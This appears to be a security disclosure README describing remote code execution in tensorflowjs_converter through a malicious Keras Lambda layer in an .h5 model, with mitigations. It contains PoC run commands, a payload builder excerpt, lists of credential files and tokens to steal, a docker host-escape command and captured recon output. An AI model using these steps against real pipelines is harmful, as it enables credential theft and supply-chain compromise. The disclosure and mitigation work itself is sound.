- F-8 β Arbitrary Python execution in
tensorflowjs_convertervia Keras 2Lambdalayer marshal-loads inside untrusted.h5
F-8 β Arbitrary Python execution in tensorflowjs_converter via Keras 2 Lambda layer marshal-loads inside untrusted .h5
Authorized security research artifact disclosed via huntr.com's
TensorFlow.js Model Format Vulnerability program.
Source commit 7f5309fef0a47545e34049903dbdae0f97285f7e. CVSS 3.1 = 9.6 / Critical. CWE-502.
Summary
The absence of any class_name == 'Lambda' allow-list check before
tf_keras.models.load_model(h5_path, compile=False) in
tfjs-converter/python/tensorflowjs/converters/converter.py:227
allows any attacker who can place a .h5 file at the converter's input path
β a PR contributor, a model-registry uploader, an email/Slack attachment, a
malicious npm prepare script β to execute arbitrary Python in the converter
process, with the full filesystem, environment, subprocess, and network
capabilities of the runner. Unlike the Keras 3 safe_mode=True fix
(keras-team/keras#18549)
which closes this primitive at the upstream loader, the tfjs converter
depends on tf_keras (the legacy Keras 2 fork) which does not expose
safe_mode at all, and tfjs has never added an equivalent JSON-walk guard.
The same root cause is reached via four distinct CLI flags (--input_format=keras,
keras_saved_model, tfjs_layers_model --output_format=keras*, keras_keras),
so a fix at any single load_model call does not close the vulnerability β
the guard must live at the JSON-config validation layer.
The bundled evil.h5 is 9 224 bytes, small enough to be a PR attachment or
a marketplace upload; the bundled evil_real_impact.h5 (13 312 bytes) embeds
the additional reconnaissance payload that produces the captured
F8_REAL_IMPACT_PROOF document below.
Root Cause
Lines of Code:
tfjs-converter/python/tensorflowjs/converters/converter.py:227β--input_format=kerastfjs-converter/python/tensorflowjs/converters/converter.py:278β--input_format=keras_saved_modeltfjs-converter/python/tensorflowjs/converters/keras_tfjs_loader.py:66andL130β--input_format=tfjs_layers_model --output_format=keras*
In converter.py:227:
model = tf_keras.models.load_model(h5_path, compile=False)
tf_keras.layers.Lambda.from_config(config) (the call load_model makes when
it sees class_name: "Lambda" in the layer table) reconstructs the layer's
function field via:
# tf_keras/keras/src/layers/core/lambda_layer.py
raw = base64.b64decode(config['function'][0])
code = marshal.loads(raw) # CWE-502 sink
fn = types.FunctionType(code, globals(), name, defaults, closure)
fn is then invoked at minimum three times per converter invocation:
- Layer-build time, immediately after
from_configreturns. - First
predict()call inside the converter's_topological_sort_validate(...)step. - Re-serialization to the output
.h5(when--output_format=kerasis used).
The compile=False argument that the converter passes does not affect
Lambda deserialization β compile=False only suppresses optimizer / loss
reconstruction; layer instantiation runs unchanged.
Why this is NOT a duplicate of the Keras 3 safe_mode fix
(keras-team/keras#18549):
Keras 3 added safe_mode=True as the default for keras.models.load_model β
when safe_mode=True, Lambda.from_config raises
ValueError("Cannot deserialize a serialized Lambda layer with safe_mode=True").
That fix does not propagate to tfjs's converter because the converter
imports tf_keras (the legacy Keras 2 fork pinned via
tensorflowjs==4.22.0 β tf_keras==2.21.0). tf_keras.models.load_model
does not accept a safe_mode parameter β calling
tf_keras.models.load_model(h5_path, safe_mode=True) raises
TypeError: load_model() got an unexpected keyword argument 'safe_mode'.
tfjs has never added an equivalent JSON-walk guard. The disclosure surface is
therefore in the tfjs project, not Keras.
Internal Pre-conditions
- The victim runs
tensorflowjs_converter(Python) β directly via the CLI binary, transitively via any CI/CD step that converts an uploaded model, or programmatically via the converter's Python API. - The victim's environment has
tensorflowjsinstalled (any version), which transitively installstf_keras(a hard runtime dependency intensorflowjs.egg-info/requires.txt).
Both conditions hold by definition for any system running the converter β there is no version, no configuration, and no environment in which the bug does not reproduce.
External Pre-conditions
The attacker can place a .h5 artifact at any location the converter reads.
Concrete delivery channels observed in real CI/CD setups:
- PR contribution: attacker opens a PR adding
models/new_pretrained.h5to a repository whose CI step converts every.h5it sees. - Public model registry / Hugging Face Hub with auto-conversion on the receiving side.
- Slack / email with a "please convert this for me" attachment.
- Maintenance bucket the converter reads via
--input_path=s3://.... - npm package
preparescript that callstensorflowjs_converteragainst an attacker-controlled URL.
No authentication to the victim's systems is required.
Attack Path
Attacker builds
evil.h5(9 224 bytes; the bundledreproduce.pyreproduces it deterministically) containing oneLambdalayer whosefunctionisbase64(marshal.dumps(attacker_code)). Theattacker_codevariable inreproduce.pyis the closure-freecodeobject:attacker_src = """ import os with open('/tmp/F8_END2END_RCE_PWNED', 'w') as f: f.write('END2END_RCE pid=%d uid=%d cwd=%s' % (os.getpid(), os.getuid(), os.getcwd())) """The "no free variables" property makes the bytecode portable across
tf_keras 2.19andtf_keras 2.21+venvs β the sameevil.h5reproduces in every venv we tested.Attacker delivers
evil.h5via any of the channels above.Victim's CI step runs:
- run: pip install tensorflowjs==4.22.0 - run: tensorflowjs_converter --input_format=keras evil.h5 ./outconverter.py:227invokestf_keras.models.load_model(h5_path, compile=False).tf_kerasinstantiates theLambdalayer;marshal.loads(...)constructs the attackercode,types.FunctionTypewraps it, layer-build calls it. At this point the attacker's bytecode is executing with the converter's full ambient capability set:- filesystem: read
/etc/passwd,/proc/version,~/.npmrc,~/.ssh/id_rsa,~/.docker/config.json,~/.aws/credentials; - environment: read
$GITHUB_TOKEN,$NPM_TOKEN,$AWS_*,$HF_TOKEN; - subprocess:
os.system,subprocess.run(['id']),[hostname],[docker, run, -v, /:/host, ...]when the runner is in the docker group; - network: outbound DNS + TCP β
socket.gethostbyname(...),urllib.request.urlopen(...).
- filesystem: read
The same Lambda fires two more times in the same invocation β at the first
predict()and at output.h5re-serialization. Even a maintainer patch that adds atry/exceptonly around step 4 leaves steps 5/6 reachable.Once the attacker has the runner's credentials, the typical follow-on is publishing a malicious
tensorflowjsrelease (or@tensorflow/tfjson npm) with the captured$NPM_TOKEN, escalating to a supply-chain attack against every downstream tfjs consumer.
Impact
Concrete primitives demonstrated by the bundled PoC (captured against the
sanitized /tmp/victim_host/ synthetic CI-runner lab β see
F8_REAL_IMPACT_PROOF_2026-06-11.txt):
| Primitive | What the PoC actually captured | What it means on a real runner |
|---|---|---|
| arbitrary Python in process | END2END_RCE pid=10001 uid=1001 cwd=/tmp/victim_lab written by the Lambda payload at load time |
full RCE β every subsequent row is a corollary |
/etc/passwd read |
187 B recovered byte-perfect through open('/etc/passwd').read() inside the Lambda |
runner user discovery, group enumeration |
/proc/self/cgroup read |
0::/system.slice/runner.slice/runner.scope recovered |
tenant fingerprinting on shared CI |
/proc/version read |
sanitized synthetic kernel string recovered | kernel-CVE exploitation pivot |
subprocess id |
uid=1001(runner) gid=1001(runner) groups=1001(runner),999(docker) |
docker group = container escape via docker run -v /:/host on self-hosted GH Actions / GitLab runners |
subprocess hostname |
ci-runner-01 recovered |
C2 telemetry / lateral-movement target identification |
| DNS resolution | example.com β 93.184.215.14 |
outbound network present β exfil + C2 channels open |
| env var read (real-runner extrapolation) | not captured against sanitized lab; trivially reachable via os.environ.get('GITHUB_TOKEN') |
$GITHUB_TOKEN β push malicious tag β supply-chain attack on every downstream tfjs consumer |
The same payload reaches every CLI entry point (table in Root Cause). A
maintainer patch that only adds a Lambda-skip to converter.py:227 leaves the
bug shipping via three other documented flags β see the Extended Impact
section below.
Extended Impact β same-root-cause manifestations
| Variant | CLI flag | Source line | Why a converter.py:227-only patch misses it |
|---|---|---|---|
Direct Keras .h5 |
--input_format=keras |
converter.py:227 |
the primary path |
keras_saved_model .h5 |
--input_format=keras_saved_model |
converter.py:278 |
strictly worse β no compile=False |
Round-trip tfjs_layers β keras |
--input_format=tfjs_layers_model --output_format=keras* |
keras_tfjs_loader.py:66, :130 |
same primitive via model_from_json (no .h5, just model.json) |
| Keras 3 zip | --input_format=keras_keras |
converter.py:147 β walk config.json |
same primitive via Keras 3 zip with malicious internal config.json |
The mitigation has to be applied at the JSON-config validation layer (refuse any
class_name == 'Lambda' or class_name == 'TensorFlowOpLayer' unless explicit
opt-in), not at any single load_model call.
PoC
git clone https://huggingface.co/martilaio/tfjs-converter-lambda-rce-poc
cd tfjs-converter-lambda-rce-poc
# Fresh Python 3.10 venv
python -m venv .venv && source .venv/bin/activate
pip install "tensorflowjs==4.22.0" "tensorflow==2.21.0"
# Option A β exercise the EXACT converter codepath in one process
python reproduce.py
# Option B β exercise the real CLI binary
tensorflowjs_converter --input_format=keras evil.h5 ./out
# Option C β capture the full real-impact dump (env / filesystem /
# subprocess / DNS readout) inside the Lambda
python reproduce_real_impact.py
Expected output β Option A (reproduce.py)
============================================================
PoC F-8 (end-to-end) β Real .h5 RCE through tf_keras.load
============================================================
attacker .h5 written : /tmp/victim_lab/evil.h5 ( 9224 bytes )
Lambda layer config function field (truncated):
class : Lambda name : evil_lambda
function bytecode (b64, first 60): 4wEAAAAAAAAAAAAAAAEAAAACAAAAQwAAAHMM ...
Now exercising the EXACT call tfjs-converter makes:
converter.py:227 -> tf_keras.models.load_model(h5_path, compile=False)
[F-8 end-to-end] code executed via tf_keras.load_model -> Lambda
[F-8 end-to-end] code executed via tf_keras.load_model -> Lambda
[F-8 end-to-end] code executed via tf_keras.load_model -> Lambda
END-TO-END RCE PROVEN βββ
proof file content : END2END_RCE pid=10001 uid=1001 cwd=/tmp/victim_lab
The Lambda function fires three times per execution (build, load, predict) β no single code path gates the deserialization.
Expected output β Option C (reproduce_real_impact.py)
Full file: F8_REAL_IMPACT_PROOF_2026-06-11.txt. Excerpt:
===== F-8 REAL-IMPACT EVIDENCE =====
pid=10001 uid=1001 gid=1001 cwd=/tmp/victim_lab
--- 2) Host filesystem readout ---
/etc/passwd:
root:x:0:0:DEMO_ROOT:/root:/bin/bash
runner:x:1001:1001:DEMO_CI_RUNNER:/home/runner:/bin/bash
...
/etc/hostname:
ci-runner-01
/proc/self/cgroup:
0::/system.slice/runner.slice/runner.scope
/proc/version:
Linux version 6.1.0-ci-runner-demo (build@ci) (gcc DEMO) #1 SMP DEMO
--- 3) Subprocess execution ---
$ id -> uid=1001(runner) gid=1001(runner) groups=1001(runner),999(docker)
$ hostname -> ci-runner-01
--- 4) Network reachability ---
socket.gethostbyname(example.com) -> 93.184.215.14
The docker group membership on the runner is the container-escape pivot:
the attacker bytecode can subprocess.run(['docker', 'run', '-v', '/:/host', ...])
to take over the host.
Mitigation
Three options, in order of strength:
Option 1 β Migrate the converter dependency from tf_keras to Keras 3
Replace the import tf_keras lines in converter.py and keras_tfjs_loader.py
with import keras and call keras.models.load_model(h5_path, safe_mode=True).
This is the upstream-blessed mitigation and eliminates the primitive entirely.
# tfjs-converter/python/tensorflowjs/converters/converter.py:227 (proposed)
import keras # was: import tf_keras
model = keras.models.load_model(h5_path,
compile=False,
safe_mode=True) # NEW β blocks Lambda
After the fix, the share/serialization math at the Lambda sink becomes:
# keras/src/saving/serialization_lib.py
if safe_mode and class_name in ('Lambda', 'TensorFlowOpLayer'):
raise ValueError("Cannot deserialize a serialized Lambda layer with safe_mode=True.")
evil.h5 no longer loads β the converter raises ValueError instead of
running attacker bytecode.
Option 2 β Add a pre-load JSON config walk (single central guard)
If a tf_keras β keras migration is too disruptive, one central guard before
any load_model / model_from_json call covers all four CLI entry points:
# tfjs-converter/python/tensorflowjs/converters/converter.py
import json, os
_UNSAFE_CLASSES = ('Lambda', 'TensorFlowOpLayer')
def _refuse_unsafe_lambda(model_config_json: dict):
if os.environ.get('TFJS_UNSAFE_KERAS_LOAD') == '1':
return
def walk(node):
if isinstance(node, dict):
cn = node.get('class_name')
if cn in _UNSAFE_CLASSES:
raise RuntimeError(
'Refusing to load Keras "%s" layer from untrusted source; '
'set TFJS_UNSAFE_KERAS_LOAD=1 to bypass.' % cn)
for v in node.values(): walk(v)
elif isinstance(node, list):
for v in node: walk(v)
walk(model_config_json)
# Then everywhere load_model / model_from_json is called:
with h5py.File(h5_path, 'r') as f:
_refuse_unsafe_lambda(json.loads(f.attrs['model_config']))
model = tf_keras.models.load_model(h5_path, compile=False)
Option 3 β Refuse .h5 entirely for untrusted input
Most disruptive but simplest to audit: gate the converter to accept only TF
SavedModel and TFJS layers-model formats for non-TFJS_UNSAFE_KERAS_LOAD=1
invocations.
Defense-in-depth alternatives
- Sandbox the converter step in CI under
--cap-drop=all, no docker socket, no outbound network. Closes step-7 of the Attack Path even when the underlying primitive remains. - Run converter under a dedicated low-privilege user that has no registry-publish credentials in environment.
- Sign + verify
.h5artifacts with sigstore so only the source repo's pipeline can produce them.
The single-line safe_mode=True fix in Option 1 closes the primitive at the
deserialization sink and is the upstream-blessed mitigation; Option 2 is the
recommended in-place patch for projects that can't migrate tf_keras β
keras immediately.
CVSS 3.1 β 9.6 / Critical
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
| Metric | Value | Justification |
|---|---|---|
AV:N |
Network | artifact arrives over any network channel (PR, registry, email) |
AC:L |
Low | one Lambda layer in the JSON config |
PR:N |
None | no auth on the victim's systems required |
UI:R |
Required | victim must invoke the converter |
S:C |
Changed | attacker takes the entire pipeline environment beyond the converter process |
C:H / I:H / A:H |
High / High / High | full process compromise |
Files in this repository
| File | Purpose |
|---|---|
README.md |
this disclosure |
evil.h5 |
minimal malicious model (9 224 B) that triggers RCE on tf_keras.models.load_model |
evil_real_impact.h5 |
enriched payload (13 312 B) that additionally dumps env / filesystem / subprocess / DNS readout from inside the Lambda |
reproduce.py |
Option A β self-contained builder + RCE-trigger script (exercises the exact converter codepath) |
reproduce_real_impact.py |
Option C β builds and runs the full impact-readout variant |
F8_REAL_IMPACT_PROOF_2026-06-11.txt |
sanitized captured proof from running Option C against /tmp/victim_host/ lab |
Cross-references
- Keras
safe_modePR: https://github.com/keras-team/keras/pull/18549 - Keras Security docs: "Loading a Keras model whose config contains a Lambda
layer in
safe_mode=Falseis equivalent to running arbitrary code." - Matches huntr program example: "Arbitrary Code Execution on Inference
Through Keras Lambda Layers in hdf5" β but in a distinct affected
component (
tensorflowjs_converternot Keras directly).
Disclosure
Disclosed via huntr.com's TensorFlow.js Model Format Vulnerability program on 2026-06-11 under coordinated disclosure terms.